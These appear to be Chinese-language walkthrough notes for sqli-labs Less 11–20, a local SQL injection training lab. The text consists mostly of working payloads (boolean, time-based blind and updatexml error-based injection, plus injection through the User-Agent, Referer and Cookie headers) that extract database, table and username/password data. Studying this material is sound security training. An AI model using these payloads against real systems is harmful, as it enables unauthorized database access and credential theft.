127.0.0.1/sqli/
(注意:有些后面直接附上了答案)
Less 11
1'or 1=1#
求数据库长度(布尔型盲注)
1' or length(database())=8#
求数据库名(xpath 报错注入。注意:updatexml 报错信息只回显 32 个字符,0x23 占 1 个,结果过长时需用 substr()/limit 分段取出)
1'and updatexml(1,concat(0x23,database()),1)#
求表数
1' or (select count(table_name) from information_schema.tables where table_schema='security')=4#
求表名
1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
求列名
1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
求字段名
1'and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 12
xpath做法
1")or 1=1#
1")and updatexml(1,concat(0x23,database()),1)#
1")and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
1")and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
1")and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 13
xpath做法
1')or 1=1#
1')and updatexml(1,concat(0x23,database()),1)#
1')and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
1')and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
1')and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 14
xpath做法
1"or 1=1#
1"and updatexml(1,concat(0x23,database()),1)#
1"and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#
1"and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
1"and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 15
时间型盲注
1'or 1=1#
1' or length(database())=8#
1' or if(ascii(substr(database(),1,1))=115,sleep(5),1)#
1' or if(ascii(substr(database(),2,1))=101,sleep(5),1)#
1' or if(ascii(substr(database(),3,1))=99,sleep(5),1)#
1' or if(ascii(substr(database(),4,1))=117,sleep(5),1)#
1' or if(ascii(substr(database(),5,1))=114,sleep(5),1)#
1' or if(ascii(substr(database(),6,1))=105,sleep(5),1)#
1' or if(ascii(substr(database(),7,1))=116,sleep(5),1)#
1' or if(ascii(substr(database(),8,1))=121,sleep(5),1)#
1' or if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)#
Less 16
1")or 1=1#
求数据库长度(时间型盲注)
1")or if(length(database())=8,sleep(5),1)#
(注意:比较条件要写在 if() 的第一个参数里;原先写成 if(length(database()),sleep(5),1)=8 时 length() 恒非零,无论长度是多少都会 sleep,无法判断)
求表数
1")or if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)#
Less 17
user name:admin(这里必须输入正确的用户名,否则试不出来)
password:' or 1=1#
求数据库名
1'or updatexml(1,concat(0x23,database()),1)#
求表名
1'or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)# 回显:emails,less42,referers,uagents(报错信息被截断为 32 字符,后面的表名需用 substr() 分段查看)
求列名
1'or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)#
求字段内容
1'or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)#
Less 18
先找出 账号和密码
之后用火狐以正确账号密码登录,用 burp 拦截该请求,注入点在 User-Agent 请求头(登录成功后服务端才会把 uagent 写入数据库):
爆库名
uagent后面添加:1' or updatexml(1,concat(0x7e,(database())),0) or '
uagent变为:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.01' or updatexml(1,concat(0x7e,(database())),0) or '
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
爆字段内容
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less 19
先找出 账号和密码
之后用火狐以正确账号密码登录,用 burp 拦截该请求,注入点在 Referer 请求头:
爆库名
referer后面添加:1' or updatexml(1,concat(0x7e,(database())),0) or '
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
爆字段内容
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less 20
先找出 账号和密码
之后用火狐以正确账号密码登录,用 burp 拦截该请求,注入点在 Cookie 中的 uname 字段:
求列数
在 Cookie 的 uname=admin 之后填 ' order by 3%23
页面刷新之后 burp 重新拦截,再在 Cookie 的 uname 后面依次加入下面的 payload
爆库名
1' or updatexml(1,concat(0x7e,(database())),0) or '
爆表名
1' or updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0) or '
爆列名
1' or updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')),0) or '
爆字段内容
1' or updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),0) or '
Less1-10链接https://blog.csdn.net/S123KO/article/details/100048575